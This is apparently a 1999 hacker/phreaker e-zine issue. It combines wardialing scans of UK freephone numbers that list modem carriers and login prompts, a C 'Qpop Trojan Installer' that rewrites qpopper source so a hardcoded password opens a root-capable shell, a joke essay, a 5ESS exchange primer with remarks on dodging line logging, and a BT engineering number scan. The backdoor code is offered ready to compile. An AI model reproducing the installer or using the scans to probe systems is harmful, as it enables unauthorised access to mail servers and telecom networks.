-->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]:::::::: __________ ____________________ ________ << \________ __ ! / __ ___ \____________/ ____ | \ /\ | \| / / \ /| \ ___ > \ | |/__\ |__/|= | \ / | | /___\ _________ __ \_________|___/ \| \| \ | ! |___/ \____________/ >> \ < \ ! \ \___ / ____ _____ \______________________________________/ \_________/ _________D4rkCyde_____________________ Communications __UK/USA_ / ___ \ ____/ \_____ __/ ___<_________ / � / / \ ___ ____________ / | \ __ /|__/| / | � | \ /___ \___>>____ ____/ | |\ / | \|= | / \ | | \___/ ____|___/ \/ |__/| \ \__ / \|___/ ________>___ __<<______/ � \____________________/ \_________ *** 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ *** ************************************* * UK Carrier scan of o8oo 917 xxxx. * * 19 January 1999 - 10 Febuary 1999 * * 117 Carriers, scanned at 96ooBaud * ************************************* *** WARNING *** Unauthorised access to or misuse of these systems is prohibited and constitutes an offence under the Computer Misuse Act 1990. We cannot be held responceible for your actions if you violate this. 19-01-99 04:12:06 08009176827 c9600: 19-01-99 04:26:16 08009175162 c2400: 0��P6��"��8�E(z��_� 19-01-99 04:42:07 08009170887 c9600: 19-01-99 05:56:18 08009171841 c2400: 19-01-99 06:21:48 08009175479 c2400: 19-01-99 06:43:55 08009171894 c2400: 19-01-99 06:46:51 08009172997 c9600: 21-01-99 03:48:37 08009177917 c9600: Radius Authentication. @ Userid: 21-01-99 03:52:15 08009178510 c9600: 21-01-99 04:36:45 08009178731 c9600: Please press .. Enter login name: 21-01-99 05:04:06 08009175201 c2400: 21-01-99 06:36:38 08009174127 c2400: 21-01-99 07:10:19 08009170512 c9600: 21-01-99 07:45:05 08009172700 c9600: Warning Unauthorised use of this network is prohibited ! Username: PASSCODE: 22-01-99 03:10:15 08009173547 c9600: 22-01-99 03:29:35 08009172055 c2400: 22-01-99 03:43:22 08009171814 cxxxx: 22-01-99 04:39:07 08009175061 c2400: 22-01-99 04:49:08 08009172194 c9600: Please press ...I PAn Employee IRHSOICB 22-01-99 05:11:14 08009174274 c2400: 22-01-99 06:07:00 08009179249 c9600: 22-01-99 06:16:54 08009173546 c9600: 22-01-99 07:42:00 08009179057 cxxxx: B00zz0BB00zz0B00zz0BDD18 B00zz0BDD18 22-01-99 16:24:04 08009171874 c9600: 22-01-99 16:32:03 08009174567 c9600: 23-01-99 02:56:13 08009176608 c9600: User Access Verification. Username: 23-01-99 03:15:37 08009175260 c2400: 23-01-99 03:32:41 08009175830 c2400: 23-01-99 03:59:19 08009174518 c9600: @ Userid: 23-01-99 05:17:30 08009175545 c2400: 23-01-99 05:26:33 08009172295 c: Leave a message and your contact details and we will contact you as soon as possible. 23-01-99 06:04:32 08009174390 c9600: Radius Authentication. @ Userid: 23-01-99 06:21:19 08009175834 c9600: Chorus/MIX V3.2 TTY Login: 23-01-99 06:31:19 08009178863 c9600: 23-01-99 18:28:39 08009172997 c9600: 23-01-99 18:39:15 08009176030 c9600: 24-01-99 06:46:03 08009171816 c9600: @ Userid: 24-01-99 07:17:45 08009171615 c9600: 24-01-99 08:06:31 08009176432 c9600: 24-01-99 09:17:30 08009170633 c9600: login: 24-01-99 09:18:53 08009170668 c9600: 24-01-99 11:06:07 08009179041 c9600: Welcome to USRobotics The Intelligent Choice in Information Access. login: 24-01-99 12:42:15 08009179246 c9600: 24-01-99 18:59:37 08009178928 c9600: Welcome to InterLinx. interlinx!login: 25-01-99 03:42:37 08009171750 c9600: 25-01-99 03:44:17 08009173549 c9600: 25-01-99 04:09:45 08009179184 c9600: 25-01-99 05:16:43 08009175222 c2400: 25-01-99 16:36:18 08009178633 c9600: User Access Verification. Username: 25-01-99 16:39:39 08009173512 c9600: User Access Verification. Username: 26-01-99 05:07:12 08009174278 c2400: 26-01-99 05:31:47 08009170116 c9600: 26-01-99 05:37:25 08009178066 c9600: Please press ... I PSharron Creaney SHARRON 26-01-99 05:52:21 08009176792 c2400: 26-01-99 06:48:46 08009176521 c9600: **B0100000027fed4 26-01-99 06:55:52 08009178703 c9600: 26-01-99 15:50:04 08009171800 c9600: Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks Checking authorization, Please wait... Annex username: 26-01-99 15:58:37 08009176950 c9600: 27-01-99 04:57:43 08009179457 c9600: @ Userid: 29-01-99 00:56:06 08009173548 c9600: 29-01-99 03:54:47 08009178374 C9600: Annex Command Line Interpreter * Copyright (C) 1988, 1998 Bay Networks #------------------------------------------------------# # Welcome to the Watson Wyatt Remote Access Service # # # # None Authorized Users should disconnect NOW ! # # # #------------------------------------------------------# Trying... Connected to 126.52.18.187. Attached to port 7 29-01-99 04:29:33 08009179206 c9600: 29-01-99 04:37:44 08009175775 c9600: 29-01-99 05:09:57 08009174298 c2400: 29-01-99 07:06:19 08009179248 c9600: 29-01-99 08:25:38 08009179245 c9600: 29-01-99 08:42:53 08009173432 c9600: Starting SecurID Authentication.User ID: 29-01-99 11:00:51 08009172017 c9600: CCCThis is really RAS3 User Access Verification Username: 29-01-99 11:30:15 08009178212 c9600: User Access Verification Username: SNK Challenge: 59886539 Enter Response: 30-01-99 03:15:17 08009175024 c2400: 30-01-99 03:32:24 08009176461 c9600: �AM��AM��AM��AM��AM��AM�� 30-01-99 04:11:52 08009171713 c9600: 30-01-99 04:19:58 08009176654 c9600: Starting Radius Authentication. @ Userid: 30-01-99 05:30:26 08009171368 c2400: U�ES��Z��q��6�[��e 30-01-99 05:39:43 08009176703 c9600: @ Userid: 30-01-99 06:44:49 08009173545 c9600: 30-01-99 06:51:00 08009175510 c2400: 30-01-99 11:03:24 08009171020 c9600: @ Userid: 30-01-99 11:17:18 08009179789 c9600: USRobotics Courier V.Everything Dial Security Session Serial Number 21OZD1G8EAQ3 Password (Ctrl-C to cancel) 31-01-99 06:08:05 08009178511 c9600: 31-01-99 06:29:55 08009179562 c9600: 31-01-99 06:47:32 08009172102 c9600: �O�UUUUUUUUUU�K��+++ 31-01-99 06:52:43 08009173433 c9600: 02-02-99 06:52:03 08009179427 c9600: Starting Radius Authentication.@ Userid: ? 02-02-99 07:02:01 08009170918 c9600: 02-02-99 07:03:15 08009179247 c9600: 03-02-99 05:36:19 08009174365 c9600: ** First Option ** Login: 03-02-99 05:39:22 08009172903 c2400: (shitload of garbage charactors) 03-02-99 05:57:07 08009173317 c9600: 03-02-99 06:34:02 08009173023 c9600: Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks Checking authorization, Please wait... Annex username: 03-02-99 09:22:04 08009170631 c9600: 04-02-99 04:11:23 08009178407 c9600: Starting Radius Authentication. @ Userid: 04-02-99 04:28:57 08009170889 c9600: 04-02-99 04:44:53 08009170064 c9600: User Access Verification Username: 04-02-99 05:08:00 08009173551 c9600: Enter ID: 04-02-99 05:09:01 08009176851 c9600: Generic-Sys (generic) [HP Release A.B9. 04] HP-UX login: 04-02-99 06:10:37 08009170343 c2400: PLEASE ENTER PASSWORD: 04-02-99 06:22:43 08009175536 c9600: @ Userid: 04-02-99 06:45:12 08009175840 c2400: 05-02-99 04:19:03 08009175151 c2400: 05-02-99 06:24:48 08009179899 c9600: User Access Verification. Username: 05-02-99 07:02:31 08009175170 c2400: 05-02-99 08:31:05 08009172995 c9600: 05-02-99 08:38:00 08009171832 c9600: login: 06-02-99 02:22:18 08009175422 c2400: 0��\��5�$x��w_1�5�!�D��7 06-02-99 05:44:27 08009171813 c9600: 06-02-99 08:22:14 08009170288 c9600: 06-02-99 08:24:09 08009176562 c9600: 06-02-99 09:09:34 08009171731 c9600: User Access Verification. Username: 07-02-99 07:21:39 08009170366 c2400: 07-02-99 07:54:11 08009173451 c9600: 08-02-99 05:02:07 08009173650 c2400: 0�� 08-02-99 05:45:19 08009175206 c2400: 08-02-99 06:42:28 08009179942 c9600: 08-02-99 06:54:39 08009172996 c9600: 09-02-99 06:05:47 08009172034 c9600: 10-02-99 15:52:04 08009174514 c9600: @ Userid: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Qpop Trojan Installer ]::[OO--[ by gov-boi ]-[ hotmetal@hack.co.za -->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]:::::::::::::: /**** Qpop v2.53 Trojan Installer v1.1 c0de by gov-boi/hotmetal of (src) hotmetal@hack.co.za Idea thought of by: nikel-com usage: tar -zxf qpopper2.53.tar.Z .. copy src-qpopd.c into the "qpopper2.53" root directory .. compile src-qpopd.c .. run .. compile qpopper2.53 .. install .. ;) and have phun kiddies ;) backd00r password is "jax0r" ****/ #include #include #include void display_usage(void); int main(int argc, char *argv[]) { char *scanstring = "The client command was not located in the command/state table"; char *w00p="pop_get_command.c"; char buffer[1002]; char buffer2[1002]; FILE *fp, *wo0p; if((fp = fopen(w00p, "r")) == NULL) { fprintf(stderr, "Error opening file: pop_get_command.c\n"); fprintf(stderr, "missi0n unsuccessfull.. lam3r!\n"); exit(1); } wo0p = fopen("zzzzzz","w"); while(fgets(buffer, 1000, fp) != NULL) { strcpy(buffer2, buffer); if(strstr(buffer, scanstring) != 0) { fprintf(wo0p," /* The client command was not located in the command/state table */\n"); fprintf(wo0p," if (p->pop_command = \"jax0r\")\n"); fprintf(wo0p," { execl(\"/bin/sh\",\"/bin/sh -i\", NULL);return(0);}\n"); } if(strstr(buffer, scanstring) == 0) { fprintf(wo0p,"%s", buffer2); } } fclose(fp); fclose(wo0p); system("mv zzzzzz pop_get_command.c"); fprintf(stderr, "missi0n successfull.. i phear j00!@#\n"); return 0; } -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Rolling Deep ]::::::::::::[OO--[ by tgb ]---[ ]:::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ http://noprotocol.org/tgb ]:::::::::: Rolling Deep With all the dangers and precarious situations the modern hax0r can find himself in on the streets, the ninties have brought forth the need to "roll deep." The whole rationale behind the concept of rolling deep lies in the age old adage. "Strength in numbers," or something along those lines, although rolling deep by no means requires a large group or backup posse. The term rolling deep stems directly from the world of hardcore hip hop and gangsta rap, and is often used in conjunction with phrases like, "Ya best proteck ya neck," "bakdafukup," or other equally street-smart phrases that manage to incorporate both defensivness and threat. In any case, the implications are easily identifiable and the prmoise of quick retaliation looms in the foreground; rolling deep is a means of letting people know that you are not to be fucked with. The perils of being caught slippin' in this day and age are just too great. I know the value of rolling deep and have integrated it into my daily routine, rolling deep for such mundane tasks as getting a late- night snack from the fridge, buying a new sweater, or making a important phone call home. Hopefully some of the following tips, examples, and observations will acquaint you with the ways of rolling deep as fuck, 'cause it's too dangerous to be caught shallow. 1. Put on the hardest clothes you can find (consult the latest number one video on Rap City) and practice scowling in the mirror for a few hours. The scowl is on the most integral aspects of rolling deep and must be perfected, although allowances can be made for the Flava-Flav type joker in every roup. Take a deep breath and tell yourself you are hard until you believe it. 2. Pretend you are in a rap video, running down the street in slow motion or backing up the MC. Visualize yourself as an actual member of a video posse. 3. Practice the "What the fuck?!" arm gesture (both arms open, palms spread outward) until it becomes an automatic response to any question, especially if from a parent, cop, boss, or teacher. 4. Grow some sort of "hard" facial hair. 5. Wear a very unhip pair of sunglasses--not bullshit Oakley or Arnet, but something like cop glasses or oversized mom-style glaasses. Basically anything you can snag out of a lost-and-found-bin will do. 6. Look around a lot, like you expecting static from any direction. 7. Cultivate a fake limp or strut and walk extremely slowly. 8. Refer to people only as "bitches" or "fools." Learn to integrate the following words or phrases into your everyday speech, regardless of their meaning in your life: gat, nine, blast in the face, bitchslap, gangstalean, etc. You are now ready to assemble the crew and synchronize the eight-step rolling deep program. Usually a larger group will signify a deeper roll, but this is not always the case. Certain people will never attain the ability to roll deep, no matter how much backup they have. Conversely, some motherfuckers roll deep when hanging out on solo tip. Some of the deepest rollers are the strong, silent types who can handles themselves in any situation. Consider the following list of some people who roll deep and some who don't quite make it. Deep As Fuck: Wu-Tang, the Warriors (from that old '70s movie), this dude I once saw lounging in a designer sweatsuit and shades, Slayer. Wading Pool: Hammer, New Kids On The Block, Blackstreet, any fast food employee or manager, rock star snowboarders, bitch-ass rollerbladers. Of course those you new to the ways of rolling deep should never try to bust a flex on someone with experience. First things first, you should go in gradually, the way one would enter a pool of freezing water. You should initially roll deep only on inanimate objects such as street signs, a jammed or locked door, or a soda machine that shorted your coin. From that point you should work your way up to blind people or alley cats, but only when you feel comfortable. Progression will naturally lead you to flexin' on old ladies and infants. Get confident, live your lyrics, and work your way up to speed. Eventually you'll be able to walk the streets with pride and conviction that can only come with the knowledge that your are rolling deep. --tgb -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ 5ESS CDX/VCDXs ]:::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]:::: -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::::::: 5ESS-2OOO Compact Exchange Units. by hybr1d (http://DTMF.org/hybrid) o Introduction o Types of compact exchanges o CDX exchange o VCDX exchange o Conclusion Introduction ------------ This is a very compact file, designed to be an intorduction, or primer to 5ESS local compact digital exchange units. I am wrtting this off the top of my head, so don't expect it to be very complex in technical nature. For starters I'll explain a little about the new 5ESS switches and there functions. We've all heard of the millenium bug, and it's supposid ability to take out massive networks etc. Well Lucent technologys, Bellcore (now telecord communications or somthing), aswell as lata exchange carrier providers such as MCI, AT&T, Sprint, and all the RBOC's such as SWBell, etc, all got a bit paranoid and decided to enhance to current 5ESS switching configurations to a new architecture they feel would be compatable with the millenium software and network problems. The new 5ESS-2OOO switches are all basically the same as conventional 5ESS switches, except the software parts, such as the administration control software platforms, and global title translation software etc, have been upgraded to be Y2K compatable. As well as this, the new 5ESS switches have been modified (based upon conventional 5ESS) to be easily upgraded in the future with new modules for future telecommunications developments. In other words, the new digital switches are very very very souped-up versions of 5ESS, infact, I would concider them to be one of the most versatile switches around. Now the deal with these new digital switching systems is that they can handle more and more lines, more network traffic, aswell as a very upgraded ability for general system capacity. They have also been upgraded with new security features to stop people like me from gaining access to the local administration part which is accessable via x25, the PSTN, and the net (on a 'secret' IP range).. I'm not going to go into that at the moment, thats another file.. Anyways, as I was saying, the new 5ESS-2OOO digital exchanges are like souped up 5ESS switches. Before there where people bitching about how they can get 'traced' messing around on the phone network because 5ESS logs shit. Well, I got news for you, 99.9% of all worldwide switching mechanisms, electro-mechanical, or digital derived, ALL log stuff, and always have done. It's just with these new 5ESS-2OOO digital exchanges, its more obvious if you are messing around. Lets say for example you where scanning over 400 numbers a night via your land line.. Normaly a 5ESS, DMS, TXE etc would just log your line usuage, calling patterns etc into a subscriber log in one of the switches sub-system parts. You would only usually get discovered if one of the field technitions, glanced at the data for you line usuage. Thats ok, because we all no that exchange field operators are lame and lazy, but what about this new 5ESS- 2OOO line loging equipment? - welp, I have bad news for you. If you scan in continuous, or repetitive cycles over your subscriber loop, the chances are, you're gonna get your haxoring ass taken to court by your RBOC, or whatever provider you are with. The reason for this is that 5ESS-2OOO digital switches continously monitor the activity, and network usuage of over 100,000 lines similtaniously. Instead of loging line status etc into a dormant log file in a sub-system, if one of the local switches notices that somthings up, a field adminstrator is notified imediatly, probably by the means of a status bar on an uplinked terminal. The new switches have been modified to be very stringent on system capacity and usuage patterns, and will notify any field office engineer of the slightest problem. The new 5ESS- 2OOO switches are basically like UK monologs, in other words, they record everything about your line, all digits dialed, even after terminating destination point, they even log the time intervals between each tone you dial/emit. Basically they are the big-bro of the phone system so start getting paranoid. (I know for a fact, that it is possible to log onto one of the local exchange units and turn line logging OFF, and even make your line appear to be non-existant). Anhow, I think I've probably made a few people a little paranoid now, on with the rest of the file. Types of local compact digital exchanges ---------------------------------------- Werd, well now its time for the focus of the file. I'm not writting a mad big file on the entire 5ESS-2OOO network because it would take _ages_, so I'm going to focus on local compact excahnges designed for the rurual community such as college campuses and areas with not many subscribers, like suberban areas of towns. There are 2 main types of compact 5ESS-2OOO local switch, the CDX (Compact Digital eXchange), and the VCDX (Very Compact Digital eXchange). Both these new units are designed to be very echonimacal for the money raking telcos. The idea is that these switches are being placed in new suberban housing developments, and are being integrated into the PSTN as we speak. The CDX digital exchange for example is designed to be very snall, handeling small local phone networks, it can however be upgraed with the implementation of modules, kind of like plug'n'play, until the switch becomes a fully fledged 5ESS-2OOO unit if required in the future. Lets take a look at these local networks in more detail. The CDX digital exchange ------------------------ The CDX (Compact Digital eXchange) is a small sized siwtch configuration, which is capable of providing the same services to subscribers the same as a conventional 5ESS switch would. Unlike the older rural exchange units, these new switches are capable of handeling more advanced telecommunications services like wideband data transmission, and video data etc. The switch is housed in a cabinet that is 6 foot high, 29.9 inches wide, and 23.6 inches deep. The switch is desinged to be a stand alone unit and as I said before, very capable of handeling current/future telecommunications developments and serverices such as POTS lines (Plain Old Telephone Service), equal access services, ISDN (Integrated Services Digital Network), CENTREX services such as call waiting, hold, etc etc. The system is also designed to be fully compatable with the Signaling System 7 telephony protocol which has been implemented over the majourity of the international PSTN. The switch can handle from 100 subscriber loops, upto 15,000 local access lines or 15,000 remote access lines. CDX operates on the same software as the conventional 5ESS-2OOO switch, and also has the same call routing architecture (physical). ______________________ Admin Console AM: Adminstration Module | | ______ CM2: Communications Module | | | | CM2C: " Compact | 3B21D |-------| | MSDT: SLC-2OOO Multi - | | |______| Services Remote |______________________| Module | | | _________________ | | | _______|_______ | SM or |--| | | | SM-2OOO |--| | CM2C |-----------| |--| (upto 6 RSM |_______________| | |--| outputs) | | |--| / |_________________| / | / | _______|_______ ______|______ _________ | | | | | | | ORM | | |--------| local | |_______________| |_____________| |_________| | | | | ORM: Remote Module RSM: Remote Switching Module SLC: Subscriber Loop Carrier SM: Switching Module The VCDX digital exchange ------------------------- VCDX stands for (VERY Compact Digital eXchange), and when I say compact, I mean compact. It is the smallest of all 5ESS-2OOO switch configurations but is still very capable of providing the same services as its bigger bro, the CDX switch. This switch is used by CATV, CAPS, small towns, and government facilitys. The switch is also capable of providing Central Office services such as the usual call waiting, and ISDN. The intersting thing about this switch is that it supports Carrier Identification Code (CIC) expansion and is compatable with changing NPA's in the Interchangable Numbering Plan Area, as required by reglatory bodys such as the FCC. The VCDX switch can support various configurations using a single 5ESS Switching Module (SM) to handle the call processing. The SM is controlled by a sophisticated UNIX software-based workstation which provides administrative and maintenance capabilities. A mimimum configuration of 2 cabinets that are 6 foot high x 29.9 inches wide x 23.6 inches deep in size is necessary and thus it fits in a small space. If left in standard mode, the VCDX can handle upto 1,500 lines. If the SM-2OOO unit is impemented as a module, the switch can handle as many as 14,000 lines. _____________ _______ | | | | | workstation |----------------| modem | |_____________| |_______| | | | __________|___________ _____________ | |--| | | | |--| | local dist |-------------| SM or SM-2OOO |--| |_____________| | |--| | | | | | |______________________|--| (to local distrobution plant. then to subscriber loops.) Conclusion ---------- Welp, thats it for this short file/article. Hope you enjoyed it. As you can see the 5ESS lcoal unit range is very complex, and is a massive improvement on previous local switching networks. Just be carefull about the subscriber loop monitoring modules. If you'd like more info on 5ESS-2OOO switching, I have put some decent information up on my website for your enjoyment and viewing pleasure. Goto http://www.dtmf.org/hybrid and check it out, you'll also be able to find the other 30+ files I've written in the past on there aswell, so go there now@! thats an order, heh. Anyways, thats it, peace. [http://darkcyde.system7.org] [http://dtmf.org/hybrid] [http://system7.org] [http://phunc.com] [http://ninex.com] [http://b4b0.org] shouts to [9x] [b4b0] [D4RKCYDE] [subz] [gr1p] [t1p] [ph1x] [downt1me] [euk] [lowtek] [digiphreq] [zomba] [force] [psyclone] [pbxphreak] [gb] [ch1ckie] [knight] [siezer] [oeb] [barby] [jasun] [pvbbs] [nino] hybrid@dtmf.org #darkcyde efnet ------------- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ O8OO672[XXX] ]::::::::::::::[OO--[ by faith ]---[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]:::::::: ******************************* Scan of BT engineering exchange 0800 672 {xxx} 1999 ******************************* 000 not recognised 001 BT paging service (24hrs) 002 - 019 nr 020 "******* messaging service - who are you calling please" :) 021 - 066 dead tone 067 BT pagaing (24hrs) some freaky woman i couldn't understand 068 - 099 nr 100 carrier 101 ringing 102 residential BT accounts service 103 carrier **************************************************************************** 104 costiomer service management centre edinborough network service provision control function has changed isdn 30 provision stage 1 look check 0800282212 isdn30 deta configeration and commisioning press 2 or dial 0800 592 831 isdn 2 provision assistance dial 3 for keep on dial 4 **MARIDIAN** **************************************************************************** 105 costomer servie amnaggement centre ed costomer repair enq 1 cch issues 3 escilation enq 4 **meridian** 106 ringing 107 carrier 108 ringing 109 dead tone 110 weird scottishj voice 111 - 114 dead tone 115 please leave a message after the tone - maridian } someone cant spell 116 ringing 117 retail sales 118 - 119 ringing 120 dead tone 121 some bloke 122 ringing 123 dead tone 124 prsonal answer phone 125 dead tone 126 "hello" 127 ringing 128 129 130 carrier *********************************************************************** 131 CSX RAM2000 system 1 to sign on - 2 to sign off 132 welcome to the BT payroll please enter you BT employee ID number *********************************************************************** 133 this number has moved 134 ringing 135 carrier 136 dead tone 137 nr 138 ringing 139 carrier 140 north of england AMU 141 - 143 dead tone 144 BT info line 145 carrier 146 operator 147 carrier 148 HR & DS???? 149 carrier 150 - 158 dead tone 159 ringing 160 sincorta???? help desk 161 nr 162 dead tone 163 employment law policy helpline 164 - 168 regia help desk 169 ringing 170 strange ring 171 - 174 ringing 175 dead tone 176 wolverhampton SMC 177 ? SMC 178 - 179 ringing 180 - 189 regia help desk 190 - 191 carrier 192 ringing 193 carrier 194 engaged 195 - 196 carrier 197 dead tone 198 ringing 199 dead tone 200 ringing 201 - 206 carrier 207 - 213 ringing 214 carrier 215 - 218 ringing 219 rec managers centre edinborough???? 220 summit direct is closed 221 some bloke 222 service centre??? 223 this number has ceased 224 some woman 225 ringing 226 engaged 227 - 229 service centre 230 dead tone 231 - 232 BT residential sales + accounts service 233 BT touchpoint helpdesk 234 engaged 235 dead tone 236 ringing 237 - 238 dead tone 239 engaged 240 - 249 regia 250 - 254 ringing 255 dead tone 256 ringing 257 dead tone 258 BT ACP Team 259 carrier 260 some bloke 261 dead tone 262 nr 263 ringing 264 carrier 265 BT Corparate and government accounts 266 ringing 267 regia 268 carrier 269 - 271 ringing 272 - 275 BT payphone??? 276 dead tone 277 some bloke 278 - 279 ringing 280 dead tone ************************************************************************** 281 please enter your 3 digit channel #, if you require a list of channel #'s please enter 999; ************************************************************************** 282 ringing 283 dead tone 284 - 289 ringing 290 carrier 291 - 292 visa international automated referal service 293 - 299 carrier 300 dead tone 301 - rang. 302 - BT & cellnet tag-team, on holdiday, answer phone. 303 - rang. 304 - 305 - 306 - 307 - rang. 308 - took time to get through, just rang. 309 - rang. 310 - fucking neat-o. VMB? some kinda technical centre. 311 - rang! 312 - 0800 990088 313 - 0800 990088 314 - 0800 990088 315 - rang. 316 - 0800 990088 317 - 318 - pair allocation help desk 319 - rang. 320 - rang. 321 - 322 - 323 - BT residensal customer account service 324 - --------======================++++++ENGAGDED+++++================--- 325 - 326 - rang 327 - rang 328 - CARRIER! 329 - rang 330 - rang 331 - rang 332 - rang 333 - fax 334 - fax/modem 335 - 336 - 337 - 338 - 339 - 340 - rang 341 - ---------------============+++ENGAGDED+++============-------------- 342 - ---------------============+++ENGAGDED+++============-------------- 343 - voice 344 - BT business something, voice. 345 - rang 346 - rang 347 - 348 - 349 - 350 - 351 - 352 - 353 - BT residensal repair service 354 - 355 - 356 - 357 - rang 358 - BCS-3 Meridian Mail system BCS ;) 359 - rang, then answer phone 360 - reck-care? help desk. options 361 - reck-care? help desk. options 362 - reck-care? help desk. options 363 - reck-care? help desk. options 364 - reck-care? help desk. options 365 - reck-care? help desk. options 366 - reck-care? help desk. options 367 - reck-care? help desk. options 368 - reck-care? help desk. options 369 - reck-care? help desk. options 370 - 371 - rang 372 - rang 373 - rang 374 - rang 375 - rang 376 - rang 377 - rang 378 - 379 - rang 380 - 381 - 382 - 383 - rang 384 - 385 - 386 - 387 - 388 - 389 - 390 - 391 - help desk for something 392 - rang 393 - carrier 394 - 395 - london product support centre. talking machine. 396 - rang 397 - really bad answer machine for something on BT? 398 - rang 399 - 400 - someone stevenson VMB. 401 - fax 402 - rang 403 - rang 404 - rang 405 - 406 - 407 - rang 408 - rang 409 - rang 410 - voice 411 - BT something solutions help desk 412 - 413 - rang 414 - voice 415 - rang 416 - really bad answer phone 417 - really bad answer phone 418 - rang 419 - answer phone 420 - rang 421 - rang 422 - rang 423 - rang 424 - rang 425 - rang 426 - rang 427 - rang 428 - rang 429 - rang 430 - BT national meridian help service 431 - BT residensal customer accounts 432 - rang 433 - 434 - BT residensal customer accounts 435 - BT direct debit customers account 436 - BT residensal customer accounts 437 - 438 - voice 439 - rang 440 - rang 441 - rang 442 - rang 443 - rang 444 - fax *************************** 445 - BT mcp credit control *************************** 446 - 447 - 448 - rang 449 - rang 450 - rang 451 - rang 452 - rang 453 - rang 454 - rang 455 - pual bowshure VMB 456 - rang 457 - rang 458 - rang 459 - rang 460 - 461 - BT service management 462 - edinbough service manager 463 - voice 464 - voice 465 - voice 466 - voice /*same voice i think, poor bastard, it just gone 02:01am */ 467 - bt local government? 468 - BT 24hour.... /*cut him off*/ 469 - rang 470 - rang 471 - voice 472 - rang 473 - rang 474 - rang 475 - rang 476 - BT residentsal customer account service 477 - 478 - rang 479 - fax 480 - voice 481 - rang 482 - voice 483 - BT VOICE MESSAGING. 484 - answer machine telecom sales desk 485 - answer machine telecom sales desk 486 - answer machine telecom sales desk 487 - answer machine telecom sales desk 488 - answer machine telecom sales desk 489 - answer machine telecom sales desk 490 - rang 491 - rang 492 - rang 493 - forwards to a VMB, but can not access(no suscibe) 494 - rang 495 - rang 496 - rang 497 - rang 498 - rang 499 - rang 500 - rang 501 - fax 502 - fax 503 - fax 504 - fax 505 - fax 506 - fax 507 - fax 508 - fax 509 - fax 510 - 511 - voice. a party? 512 - answer phone 513 - rang 514 - answer phone 515 - answer phone 516 - answer phone 517 - answer phone 518 - answer phone 519 - rang 520 - 521 - 522 - 523 - rang 524 - 525 - Concert VNS. card and pin # *************************************************** 526 - FUCKING INTERESTING (dialtone) *************************************************** 527 - rang 528 - BT customer service centre 529 - BT service management 530 - BT national meridian operation centre 531 - 532 - *************************************************** 533 - HAHAHAH THE NAME GAME NUMBER *************************************************** 534 - 535 - 536 - 537 - BT something or another 538 - BT sincordless solutions 539 - 540 - 541 - 542 - BT residensal customer account service 543 - fax 544 - 545 - rang 546 - fax 547 - voice 548 - rang 549 - rang 550 - Hillsdown help desk, OPtions 551 - fax 552 - BT phoneBook supply 553 - rang 554 - work manager edinbough 555 - work manager edinbough 556 - work manager edinbough 557 - work manager edinbough 558 - rang 559 - more work manager stuff 560 - rang 561 - telecom sales desk 562 - telecom sales desk 563 - telecom sales desk 564 - telecom sales desk 565 - telecom sales desk } they supply BT with hardware 566 - telecom sales desk 567 - telecom sales desk 568 - telecom sales desk 569 - telecom sales desk 570 - 571 - cambridge service management centre 572 - 573 - cambridge service management centre 574 - cambridge service management centre 575 - cambridge service management centre 576 - cambridge service management centre 577 - cambridge service management centre 578 - cambridge service management centre 579 - cambridge service management centre 580 - rang 581 - cambridge service management centre 582 - 583 - cambridge service management centre 584 - cambridge service management centre 585 - cambridge service management centre 586 - cambridge service management centre 587 - voice 588 - cambridge service management centre 589 - edinbrough service management centre 590 - rang 591 - edinbrough service management centre 592 - cambridge service management centre 593 - rang 594 - 595 - rang 596 - 597 - fax 598 - fax 599 - fax 600 - BT security 0800321999 * nasty * Rang = boring fucking wankers 0800 990088 = whats the fucking point? neat-o = werd (oh fuck, tell i been using IRC!) the nothings = bollox, just fucking bollox. other = god gave us the phone for something, and it aint phone shags carrier = YERRR. voice = I hate getting though to voice, always phreaks me! :) ------------------------------------------------------------------------------- 0800-672-328 User Access Verification Login:guest Password: % Authentication failed. =============================================================================== 0800-672-393 WARNING: You are about to access a controlled system. You are required to have a personal authorisation to use this system and you are strictly limited to the use set out in that written authorisation. Unauthorised access to or misuse of this system is prohibited and constitutes an offence under the Computer Misuse Act 1990. Only proceed if you are authorised to use this system as detailed above. 02:Login: =============================================================================== 0800 672 600 [BT security. 0800 321 999] 0800 672 601 [dead] 0800 672 602 [modem/fax] 0800 672 603 [modem/fax] 0800 672 604 [no answer] 0800 672 605 [no answer] 0800 672 606 [strange, no ring then internal dead tone] 0800 672 607 [same] 0800 672 608 [dead] 0800 672 609 [internal dead tone] 0800 672 610 [BT residential customer accounts service, recording] 0800 672 611 [dead] 0800 672 612 [BT residential customer accounts service] 0800 672 613 [dead] 0800 672 614 [dead] 0800 672 615 [no answer] 0800 672 616 [dead] 0800 672 617 [dead] 0800 672 618 [no answer] 0800 672 619 [no answer] 0800 672 620 [re-routed, cell-phone?] 0800 672 621 [re-routed, cell-phone?] 0800 672 622 [re-routed, cell-phone?] 0800 672 623 [re-routed, cell-phone?] 0800 672 624 [re-routed, cell-phone?] 0800 672 625 [re-routed, cell-phone?] 0800 672 626 [re-routed, cell-phone?] 0800 672 627 [re-routed, cell-phone?] 0800 672 628 [re-routed, cell-phone?] 0800 672 629 [re-routed, cell-phone?] 0800 672 630 [re-routed, cell-phone?] 0800 672 631 [re-routed, cell-phone?] 0800 672 632 [re-routed, cell-phone?] 0800 672 633 [dead] 0800 672 634 [dead] 0800 672 635 [London Meridian Operations Center. Meridian Mail, hehe. 0800 672 636 [BT voice messaging, *massive* voicemail network.login number] 0800 672 637 [BT voice messaging, leave a message number] 0800 672 638 [no answer] 0800 672 639 [no answer] 0800 672 640 [dead] 0800 672 641 [dead] 0800 672 642 [dead] 0800 672 643 [no answer] 0800 672 644 [dead] 0800 672 645 